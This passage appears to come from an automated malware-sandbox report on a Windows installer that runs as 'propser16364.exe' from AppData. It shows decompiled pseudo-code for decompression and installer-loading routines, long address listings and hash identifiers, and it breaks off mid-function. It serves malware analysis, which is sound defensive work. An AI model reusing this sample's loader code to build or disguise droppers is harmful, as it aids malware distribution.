										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                              0x00000000
                                                              0x00406925
                                                              0x00406925
                                                              0x0040692a
                                                              0x004069a1
                                                              0x004069a8
                                                              0x004069b2
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00407007
                                                              0x00407007
                                                              0x0040700d
                                                              0x0040700d
                                                              0x00000000
                                                              0x00406fe2
                                                              0x00406fe2
                                                              0x00406fe6
                                                              0x00407195
                                                              0x00000000
                                                              0x00407195
                                                              0x00406ff2
                                                              0x00406ff9
                                                              0x00407001
                                                              0x00407004
                                                              0x00000000
                                                              0x00407004
                                                              0x0040692c
                                                              0x0040692c
                                                              0x00406930
                                                              0x00406938
                                                              0x0040693b
                                                              0x0040693d
                                                              0x00406940
                                                              0x00406942
                                                              0x00406947
                                                              0x0040694a
                                                              0x00406951
                                                              0x00406958
                                                              0x0040695b
                                                              0x00406966
                                                              0x0040696e
                                                              0x0040696e
                                                              0x00406968
                                                              0x00406968
                                                              0x00406968
                                                              0x0040695d
                                                              0x0040695d
                                                              0x0040695d
                                                              0x00406975
                                                              0x00406993
                                                              0x00406995
                                                              0x00406b68
                                                              0x00406b68
                                                              0x00406b6b
                                                              0x00406b6e
                                                              0x00406b71
                                                              0x00406b74
                                                              0x00406b77
                                                              0x00406b7a
                                                              0x00406b7d
                                                              0x00406b80
                                                              0x00406b86
                                                              0x00406b9e
                                                              0x00406ba1
                                                              0x00406ba4
                                                              0x00406ba7
                                                              0x00406ba7
                                                              0x00406baa
                                                              0x00406bb0
                                                              0x00406b88
                                                              0x00406b88
                                                              0x00406b90
                                                              0x00406b95
                                                              0x00406b97
                                                              0x00406b99
                                                              0x00406b99
                                                              0x00406bba
                                                              0x00406bbd
                                                              0x00406b60
                                                              0x00406b66
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00406b3b
                                                              0x00406b3f
                                                              0x00407147
                                                              0x00000000
                                                              0x00407147
                                                              0x00406b45
                                                              0x00406b48
                                                              0x00406b4b
                                                              0x00406b4f
                                                              0x00406b52
                                                              0x00406b58
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5d
                                                              0x00000000
                                                              0x00406b5d
                                                              0x00406977
                                                              0x00406977
                                                              0x0040697a
                                                              0x00406980
                                                              0x00406982
                                                              0x00406982
                                                              0x00406985
                                                              0x00406988
                                                              0x0040698a
                                                              0x0040698b
                                                              0x0040698e
                                                              0x004069fb
                                                              0x004069fb
                                                              0x004069ff
                                                              0x00406a02
                                                              0x00406a05
                                                              0x00406a08
                                                              0x00406a0b
                                                              0x00406a0c
                                                              0x00406a0f
                                                              0x00406a11
                                                              0x00406a17
                                                              0x00406a1a
                                                              0x00406a1d
                                                              0x00406a20
                                                              0x00406a23
                                                              0x00406a29
                                                              0x00406a45
                                                              0x00406a48
                                                              0x00406a4b
                                                              0x00406a4e
                                                              0x00406a55
                                                              0x00406a5b
                                                              0x00406a5f
                                                              0x00406a2b
                                                              0x00406a2b
                                                              0x00406a2f
                                                              0x00406a37
                                                              0x00406a3c
                                                              0x00406a3e
                                                              0x00406a40
                                                              0x00406a40
                                                              0x00406a69
                                                              0x00406a6c
                                                              0x004069e3
                                                              0x004069e3
                                                              0x004069e9
                                                              0x00406a9c
                                                              0x00406aa2
                                                              0x00000000
                                                              0x00000000
                                                              0x00406aa4
                                                              0x00406aa7
                                                              0x00406aaa
                                                              0x00406aad
                                                              0x00406ab0
                                                              0x00406ab3
                                                              0x00406ab6
                                                              0x00406ab9
                                                              0x00406abc
                                                              0x00406ac2
                                                              0x00406ada
                                                              0x00406add
                                                              0x00406ae0
                                                              0x00406ae3
                                                              0x00406ae3
                                                              0x00406ae6
                                                              0x00406aec
                                                              0x00406ac4
                                                              0x00406ac4
                                                              0x00406acc
                                                              0x00406ad1
                                                              0x00406ad3
                                                              0x00406ad5
                                                              0x00406ad5
                                                              0x00406af6
                                                              0x00406af9
                                                              0x00406a77
                                                              0x00406a7b
                                                              0x0040713b
                                                              0x00000000
                                                              0x0040713b
                                                              0x00406a81
                                                              0x00406a84
                                                              0x00406a87
                                                              0x00406a8b
                                                              0x00406a8e
                                                              0x00406a94
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a99
                                                              0x00406a99
                                                              0x00406af9
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b04
                                                              0x00406b04
                                                              0x00406b07
                                                              0x00406b0a
                                                              0x00406b0e
                                                              0x00407153
                                                              0x00000000
                                                              0x00407153
                                                              0x00406b14
                                                              0x00406b17
                                                              0x00406b1a
                                                              0x00406b1d
                                                              0x00406b20
                                                              0x00406b23
                                                              0x00406b26
                                                              0x00406b28
                                                              0x00406b2b
                                                              0x00406b2e
                                                              0x00406b31
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00406cd0
                                                              0x00406cd0
                                                              0x00406cd3
                                                              0x00406cd3
                                                              0x00000000
                                                              0x00406cd3
                                                              0x004069f5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406a72
                                                              0x004069be
                                                              0x004069c2
                                                              0x0040712f
                                                              0x004071ab
                                                              0x004071b3
                                                              0x004071ba
                                                              0x004071bc
                                                              0x004071c3
                                                              0x004071c7
                                                              0x004071c7
                                                              0x004069c8
                                                              0x004069cb
                                                              0x004069ce
                                                              0x004069d2
                                                              0x004069d5
                                                              0x004069db
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069e0
                                                              0x00000000
                                                              0x004069e0
                                                              0x00406a6c
                                                              0x00406975
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067b2
                                                              0x004071c0
                                                              0x004071c0
                                                              0x00000000
                                                              0x004071c0
                                                              0x004067b8
                                                              0x00000000
                                                              0x004067c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004067cc
                                                              0x004067cf
                                                              0x004067d2
                                                              0x004067d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dc
                                                              0x004067df
                                                              0x004067e1
                                                              0x004067e2
                                                              0x004067e5
                                                              0x004067e7
                                                              0x004067e8
                                                              0x004067ea
                                                              0x004067ed
                                                              0x004067f2
                                                              0x004067f7
                                                              0x00406800
                                                              0x00406813
                                                              0x00406816
                                                              0x00406822
                                                              0x0040684a
                                                              0x0040684c
                                                              0x0040685a
                                                              0x0040685a
                                                              0x0040685e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040684e
                                                              0x0040684e
                                                              0x00406851
                                                              0x00406852
                                                              0x00406852
                                                              0x00000000
                                                              0x0040684e
                                                              0x00406828
                                                              0x0040682d
                                                              0x0040682d
                                                              0x00406836
                                                              0x0040683e
                                                              0x00406841
                                                              0x00000000
                                                              0x00406847
                                                              0x00406847
                                                              0x00000000
                                                              0x00406847
                                                              0x00000000
                                                              0x00406864
                                                              0x00406864
                                                              0x00406868
                                                              0x00407114
                                                              0x00000000
                                                              0x00407114
                                                              0x00406871
                                                              0x00406881
                                                              0x00406884
                                                              0x00406887
                                                              0x00406887
                                                              0x00406887
                                                              0x0040688a
                                                              0x0040688e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406890
                                                              0x00406896
                                                              0x004068c0
                                                              0x004068c6
                                                              0x004068cd
                                                              0x00000000
                                                              0x004068cd
                                                              0x0040689c
                                                              0x0040689f
                                                              0x004068a4
                                                              0x004068a4
                                                              0x004068af
                                                              0x004068b7
                                                              0x004068ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004068ff
                                                              0x00406905
                                                              0x00406908
                                                              0x00406915
                                                              0x0040691d
                                                              0x00000000
                                                              0x00000000
                                                              0x004068d4
                                                              0x004068d4
                                                              0x004068d8
                                                              0x00407123
                                                              0x00000000
                                                              0x00407123
                                                              0x004068e4
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068f2
                                                              0x004068f5
                                                              0x004068f8
                                                              0x004068fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bc4
                                                              0x00406bc8
                                                              0x00406be6
                                                              0x00406be9
                                                              0x00406bf0
                                                              0x00406bf3
                                                              0x00406bf6
                                                              0x00406bf9
                                                              0x00406bfc
                                                              0x00406bff
                                                              0x00406c01
                                                              0x00406c08
                                                              0x00406c09
                                                              0x00406c0b
                                                              0x00406c0e
                                                              0x00406c11
                                                              0x00406c14
                                                              0x00406c14
                                                              0x00406c19
                                                              0x00000000
                                                              0x00406c19
                                                              0x00406bca
                                                              0x00406bcd
                                                              0x00406bd0
                                                              0x00406bda
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c2e
                                                              0x00406c32
                                                              0x00406c55
                                                              0x00406c58
                                                              0x00406c5b
                                                              0x00406c65
                                                              0x00406c34
                                                              0x00406c34
                                                              0x00406c37
                                                              0x00406c3a
                                                              0x00406c3d
                                                              0x00406c4a
                                                              0x00406c4d
                                                              0x00406c4d
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c71
                                                              0x00406c75
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c7b
                                                              0x00406c7f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c85
                                                              0x00406c87
                                                              0x00406c8b
                                                              0x00406c8b
                                                              0x00406c8e
                                                              0x00406c92
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ce2
                                                              0x00406ce6
                                                              0x00406ced
                                                              0x00406cf0
                                                              0x00406cf3
                                                              0x00406cfd
                                                              0x00000000
                                                              0x00406cfd
                                                              0x00406ce8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d09
                                                              0x00406d0d
                                                              0x00406d14
                                                              0x00406d17
                                                              0x00406d1a
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d1d
                                                              0x00406d20
                                                              0x00406d23
                                                              0x00406d23
                                                              0x00406d26
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d36
                                                              0x00406d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00406dc9
                                                              0x00406dc9
                                                              0x00406dcd
                                                              0x0040716b
                                                              0x00000000
                                                              0x0040716b
                                                              0x00406dd3
                                                              0x00406dd6
                                                              0x00406dd9
                                                              0x00406ddd
                                                              0x00406de0
                                                              0x00406de6
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406deb
                                                              0x00406dee
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e4c
                                                              0x00406e4c
                                                              0x00406e50
                                                              0x00407177
                                                              0x00000000
                                                              0x00407177
                                                              0x00406e56
                                                              0x00406e59
                                                              0x00406e5c
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e69
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c1c
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f5b
                                                              0x00406f5f
                                                              0x00406f81
                                                              0x00406f84
                                                              0x00406f8e
                                                              0x00000000
                                                              0x00406f8e
                                                              0x00406f61
                                                              0x00406f64
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6b
                                                              0x00406f6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00407018
                                                              0x0040701c
                                                              0x0040703a
                                                              0x0040703a
                                                              0x0040703a
                                                              0x00407041
                                                              0x00407048
                                                              0x0040704f
                                                              0x0040704f
                                                              0x00000000
                                                              0x0040704f
                                                              0x0040701e
                                                              0x00407021
                                                              0x00407024
                                                              0x00407027
                                                              0x0040702e
                                                              0x00406f72
                                                              0x00406f72
                                                              0x00406f75
                                                              0x00000000
                                                              0x00000000
                                                              0x00407109
                                                              0x0040710c
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d43
                                                              0x00406d45
                                                              0x00406d4c
                                                              0x00406d4d
                                                              0x00406d4f
                                                              0x00406d52
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5a
                                                              0x00406d5d
                                                              0x00406d60
                                                              0x00406d62
                                                              0x00406d64
                                                              0x00406d64
                                                              0x00406d65
                                                              0x00406d68
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d80
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x00000000
                                                              0x00000000
                                                              0x00407065
                                                              0x00407065
                                                              0x00407069
                                                              0x004071a1
                                                              0x00000000
                                                              0x004071a1
                                                              0x0040706f
                                                              0x00407072
                                                              0x00407075
                                                              0x00407079
                                                              0x0040707c
                                                              0x00407082
                                                              0x00407084
                                                              0x00407084
                                                              0x00407084
                                                              0x00407087
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708d
                                                              0x0040708d
                                                              0x00407091
                                                              0x004070f1
                                                              0x004070f4
                                                              0x004070f9
                                                              0x004070fa
                                                              0x004070fc
                                                              0x004070fe
                                                              0x00407101
                                                              0x00000000
                                                              0x00407101
                                                              0x00407093
                                                              0x00407099
                                                              0x0040709c
                                                              0x0040709f
                                                              0x004070a2
                                                              0x004070a5
                                                              0x004070a8
                                                              0x004070ab
                                                              0x004070ae
                                                              0x004070b1
                                                              0x004070b4
                                                              0x004070cd
                                                              0x004070d0
                                                              0x004070d3
                                                              0x004070d6
                                                              0x004070da
                                                              0x004070dc
                                                              0x004070dc
                                                              0x004070dd
                                                              0x004070e0
                                                              0x004070b6
                                                              0x004070b6
                                                              0x004070be
                                                              0x004070c3
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070c8
                                                              0x004070e3
                                                              0x004070ea
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x00406d88
                                                              0x00406d8b
                                                              0x00406dc1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef4
                                                              0x00406ef4
                                                              0x00406ef7
                                                              0x00406ef9
                                                              0x00407183
                                                              0x00000000
                                                              0x00407183
                                                              0x00406eff
                                                              0x00406f02
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f08
                                                              0x00406f0c
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00000000
                                                              0x00406f0f
                                                              0x00406d8d
                                                              0x00406d8f
                                                              0x00406d91
                                                              0x00406d93
                                                              0x00406d96
                                                              0x00406d97
                                                              0x00406d99
                                                              0x00406d9b
                                                              0x00406d9e
                                                              0x00406da1
                                                              0x00406db7
                                                              0x00406dbc
                                                              0x00406df4
                                                              0x00406df4
                                                              0x00406df8
                                                              0x00406e24
                                                              0x00406e26
                                                              0x00406e2d
                                                              0x00406e30
                                                              0x00406e33
                                                              0x00406e33
                                                              0x00406e38
                                                              0x00406e38
                                                              0x00406e3a
                                                              0x00406e3d
                                                              0x00406e44
                                                              0x00406e47
                                                              0x00406e74
                                                              0x00406e74
                                                              0x00406e77
                                                              0x00406e7a
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00000000
                                                              0x00406eee
                                                              0x00406e7c
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8b
                                                              0x00406e8e
                                                              0x00406e91
                                                              0x00406e94
                                                              0x00406e97
                                                              0x00406e9a
                                                              0x00406e9d
                                                              0x00406eb6
                                                              0x00406eb8
                                                              0x00406ebb
                                                              0x00406ebc
                                                              0x00406ebf
                                                              0x00406ec1
                                                              0x00406ec4
                                                              0x00406ec6
                                                              0x00406ec8
                                                              0x00406ecb
                                                              0x00406ecd
                                                              0x00406ed0
                                                              0x00406ed4
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed7
                                                              0x00406eda
                                                              0x00406edd
                                                              0x00406e9f
                                                              0x00406e9f
                                                              0x00406ea7
                                                              0x00406eac
                                                              0x00406eae
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406ee0
                                                              0x00406ee7
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00406ee7
                                                              0x00406dfa
                                                              0x00406dfd
                                                              0x00406dff
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0a
                                                              0x00406e0d
                                                              0x00406e10
                                                              0x00406e10
                                                              0x00406e13
                                                              0x00406e13
                                                              0x00406e16
                                                              0x00406e1d
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00406e1d
                                                              0x00406da3
                                                              0x00406da6
                                                              0x00406da8
                                                              0x00406dab
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c95
                                                              0x00406c95
                                                              0x00406c99
                                                              0x0040715f
                                                              0x00000000
                                                              0x0040715f
                                                              0x00406c9f
                                                              0x00406ca2
                                                              0x00406ca5
                                                              0x00406ca8
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406cad
                                                              0x00406cb0
                                                              0x00406cb3
                                                              0x00406cb6
                                                              0x00406cb9
                                                              0x00406cbc
                                                              0x00406cbd
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cc2
                                                              0x00406cc5
                                                              0x00406cc8
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406cce
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f16
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f1c
                                                              0x00406f1f
                                                              0x00406f22
                                                              0x00406f25
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f2a
                                                              0x00406f2d
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00406f36
                                                              0x00406f39
                                                              0x00406f3a
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3f
                                                              0x00406f42
                                                              0x00406f45
                                                              0x00406f48
                                                              0x00406f4b
                                                              0x00406f4f
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00000000
                                                              0x00406f56
                                                              0x00000000
                                                              0x00406f56
                                                              0x00406f54
                                                              0x00407189
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                                              • Instruction ID: 6d311f2402807b87ac493386ce59d8e56409eb9bb3693b5a24021ea98ba03221
                                                              • Opcode Fuzzy Hash: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                                              • Instruction Fuzzy Hash: 3AF18571D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED456BB281D3786A86CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040659C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040659C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225a0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225a0;
			}




                                                              0x004065a7
                                                              0x004065b0
                                                              0x00000000
                                                              0x004065bd
                                                              0x004065b3
                                                              0x00000000

                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(76712754,004225A0,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,00405CF1,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,C:\Users\user\AppData\Local\Temp\nsxAB11.tmp,76712754,?,766F13E0,00405A10,?,76712754,766F13E0), ref: 004065A7
                                                              • FindClose.KERNEL32(00000000), ref: 004065B3
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsxAB11.tmp, xrefs: 0040659C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp
                                                              • API String ID: 2295610775-1143524229
                                                              • Opcode ID: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                                              • Instruction ID: f69e928bf0ac745f57f8f0961b1e49234d8ba52852923c3f30ba08d6865e50e3
                                                              • Opcode Fuzzy Hash: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                                              • Instruction Fuzzy Hash: 64D01231615130FBC3411B38BE0C84B7A5C9F093303619B36F466F12E4D7748D62869C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 96%
                                                              			E00402EF1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x424750 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Albus\\AppData\\Roaming\\propser16364.exe", 0x400);
				_t106 = E00405DC1("C:\\Users\\Albus\\AppData\\Roaming\\propser16364.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406228("C:\\Users\\Albus\\AppData\\Roaming", "C:\\Users\\Albus\\AppData\\Roaming\\propser16364.exe");
				E00406228(0x42c000, E00405C07("C:\\Users\\Albus\\AppData\\Roaming"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x41f908 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402E52(1);
					__eflags =  *0x424758 - _t94;
					if( *0x424758 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t111 = GlobalAlloc(0x40, _v20);
						E00406756(0x40b870);
						E00405DF0( &_v300, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403419( *0x424758 + 0x1c);
							 *0x41f90c = _t65;
							 *0x41f900 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403192(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x424754 = _t111;
								 *0x42475c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x424760 =  *0x424760 + 1;
									__eflags =  *0x424760;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
